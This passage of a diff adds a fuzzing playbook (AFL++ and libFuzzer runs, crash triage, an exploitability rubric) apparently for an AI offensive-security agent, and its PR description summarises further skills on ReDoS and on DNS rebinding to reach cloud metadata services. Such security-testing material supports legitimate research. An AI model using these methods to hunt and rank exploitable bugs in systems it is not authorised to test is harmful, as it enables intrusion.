+# AFL++ minimize corpus to remove redundant seeds
+afl-cmin -i /workspace/corpus/initial \
+         -o /workspace/corpus/minimized \
+         -- /workspace/build-afl/harness @@
+```
+
+Good seed = valid, minimal, diverse. 5–50 seeds beats 5000 random bytes.
+
+## 6. Run AFL++
+
+```bash
+mkdir -p /workspace/findings/afl
+
+# Single-core
+AFL_SKIP_CPUFREQ=1 \
+AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1 \
+afl-fuzz \
+  -i /workspace/corpus/minimized \
+  -o /workspace/findings/afl \
+  -t 1000 \           # timeout per testcase (ms)
+  -- /workspace/build-afl/harness @@
+
+# Multi-core (1 main + N-1 secondary)
+# Main:
+afl-fuzz -M main-fuzzer -i /workspace/corpus/minimized \
+  -o /workspace/findings/afl -- /workspace/build-afl/harness @@
+# Secondary (run in parallel):
+afl-fuzz -S sec-01 -i /workspace/corpus/minimized \
+  -o /workspace/findings/afl -- /workspace/build-afl/harness @@
+```
+
+### Key AFL++ environment flags
+
+| Flag | Effect |
+|------|--------|
+| `AFL_USE_ASAN=1` | Enable ASan in afl-fuzz without recompile |
+| `AFL_DISABLE_TRIM=1` | Skip trim step (faster iteration) |
+| `AFL_FAST_CAL=1` | Reduce calibration cycles |
+| `AFL_CUSTOM_MUTATOR_LIBRARY` | Load grammar/structure-aware mutator |
+| `AFL_LLVM_CMPLOG=1` + `-c cmplog_binary` | Token extraction from cmp instructions |
+
+## 7. Run libFuzzer
+
+```bash
+mkdir -p /workspace/findings/lf /workspace/corpus/lf-work
+
+# Merge initial corpus into working corpus first
+/workspace/build-lf/fuzz_target \
+  -merge=1 \
+  /workspace/corpus/lf-work \
+  /workspace/corpus/minimized
+
+# Fuzz with ASAN_OPTIONS for cleaner reports
+ASAN_OPTIONS=halt_on_error=1:print_stats=1 \
+/workspace/build-lf/fuzz_target \
+  -max_total_time=3600 \
+  -artifact_prefix=/workspace/findings/lf/ \
+  -jobs=$(nproc) \
+  -workers=$(nproc) \
+  /workspace/corpus/lf-work
+```
+
+## 8. Crash Triage
+
+### Reproduce a crash
+```bash
+# AFL++ crash
+ASAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \
+/workspace/build-afl/harness /workspace/findings/afl/default/crashes/id:000000*
+
+# libFuzzer crash
+ASAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \
+/workspace/build-lf/fuzz_target /workspace/findings/lf/crash-*
+```
+
+### Minimize crash (AFL++)
+```bash
+afl-tmin \
+  -i /workspace/findings/afl/default/crashes/id:000000 \
+  -o /workspace/findings/crash-min.bin \
+  -- /workspace/build-afl/harness @@
+```
+
+### Parse crash output
+
+| ASan report prefix | Bug class | Exploitability |
+|-------------------|-----------|---------------|
+| `heap-buffer-overflow` | OOB read/write on heap | Write → HIGH, Read → MEDIUM |
+| `stack-buffer-overflow` | OOB on stack | Often HIGH (canary missing → RCE) |
+| `heap-use-after-free` | UAF | HIGH — check if write capability |
+| `global-buffer-overflow` | OOB on global | Context-dependent |
+| `null-dereference` | NULL deref | LOW-MEDIUM (usually DoS) |
+| `double-free` | Double free | HIGH in glibc < 2.35 |
+| UBSan `signed-integer-overflow` | Integer overflow | Context-dependent |
+| UBSan `shift-exponent` | Undefined shift | Usually LOW |
+
+## 9. Exploitability Rubric
+
+Assess each unique crash:
+
+1. **Is it write or read?** Write-anywhere = HIGH. Read = may still be HIGH
+   (information leak) or MEDIUM (crash only).
+2. **Is address attacker-controlled?** Check if `addr` in the ASan report
+   correlates with bytes from the fuzz input.
+3. **Is there a canary?** `checksec --file=/workspace/build-afl/harness`.
+   No canary on a stack overflow = trivially exploitable.
+4. **Unique crash count:** Run `afl-whatsup -s /workspace/findings/afl/`.
+   Deduplicate by first 3 frames of the stack trace.
+
+```bash
+# Deduplicate crashes by backtrace hash (quick)
+for f in /workspace/findings/afl/default/crashes/id:*; do
+  ASAN_OPTIONS=halt_on_error=1 \
+  /workspace/build-afl/harness "$f" 2>&1 | \
+  grep "^    #[0-2] " | md5sum | cut -d' ' -f1
+done | sort | uniq -c | sort -rn | head -20
+```
+
+## 10. Promote to KG
+
+For each confirmed unique crash:
+
+```
+kg_add_node("vulnerability",
+  label="heap-buffer-overflow in target_parse()",
+  props={
+    "crash_input": "/workspace/findings/crash-min.bin",
+    "class": "heap-buffer-overflow",
+    "asan_report_summary": "WRITE of size 1 at 0x... heap base+0x28",
+    "exploitability": "HIGH",
+    "repro": "ASAN_OPTIONS=halt_on_error=1 ./harness crash-min.bin",
+    "key": "fuzzing:heap-bof-target-parse"
+  })
+```
+
+## Tools Quick Reference
+
+| Tool | Install | Use |
+|------|---------|-----|
+| `afl-fuzz` | `apt install afl++` | Coverage-guided mutation fuzzer |
+| `afl-clang-fast` | bundled with afl++ | Instrumented compilation |
+| `afl-tmin` | bundled | Test case minimization |
+| `afl-cmin` | bundled | Corpus minimization |
+| `afl-whatsup` | bundled | Multi-instance status summary |
+| libFuzzer | clang built-in | In-process fuzzer (LLVM) |
+| honggfuzz | `apt install honggfuzz` | Good for network/socket targets |
+| `cargo fuzz` | `cargo install cargo-fuzz` | Rust fuzzing (libFuzzer backend) |


### PR DESCRIPTION
## Summary

Four new operator-grade skill playbooks filling gaps in RE and web attack surface coverage:

- **`reverser/deep-analysis`** — depth-first RE investigation loop (decompile→rename→retype→comment→re-read) with explicit context-rot guards, on-task checks every 3–5 tool calls, and per-question strategies for crypto identification, C2 protocol recovery, and struct reconstruction. Complements the existing breadth-first `triage` skill.
- **`reverser/fuzzing`** — coverage-guided fuzzing methodology: target scoping, fuzzer selection (AFL++/libFuzzer/Honggfuzz), instrumented build flags, persistent-mode and libFuzzer harness skeletons, seed corpus curation (afl-cmin), multi-core AFL++ invocation, crash triage with `afl-tmin`, and an exploitability rubric mapping ASan report prefixes to bug classes.
- **`analyst/redos`** — ReDoS hunting (CWE-1333): backtracking engine inventory (PCRE/RE2/V8/Python `re`), catastrophic-pattern recognition (nested quantifiers, overlapping alternation), taint grep patterns for Python/Node/Java/PHP/Ruby, evil-string construction, timing PoC script, `validate_finding` contract, and CVSS baselines.
- **`exploit/web/dns-rebinding`** — DNS rebinding to reach IMDS/localhost from victim browser: TTL=0 mechanics, rbndr.us hostname format, Singularity self-hosted setup, retry-loop payload JS, AWS/GCP/Azure IMDS pivot, Electron/desktop app port table, defense bypass table (Host header validation, DNS pinning, PNA), and per-impact-tier CVSS.

## Collision check

Verified no overlap with `feat/skills-reference-harvest` (11 skills: ctf-triage, linux-privesc-enum, etc.) or `feat/skills-adversary-emulation` (APT group playbooks). All 4 directory names are new in `main`.

## Test plan

- [x] `uv run pytest packages/decepticon/tests/unit/tools/test_skills_registry.py packages/decepticon/tests/unit/skillogy/test_registry.py -q` → **45 passed, 3 warnings**
- [x] `uv run ruff check packages/decepticon/` → **All checks passed**
- [x] Each `SKILL.md` has `name`, `description`, and `allowed-tools`/`metadata` fields conforming to the spec in `docs/skills.md`
- [x] Each `name` value matches the directory name convention used by the surrounding skill category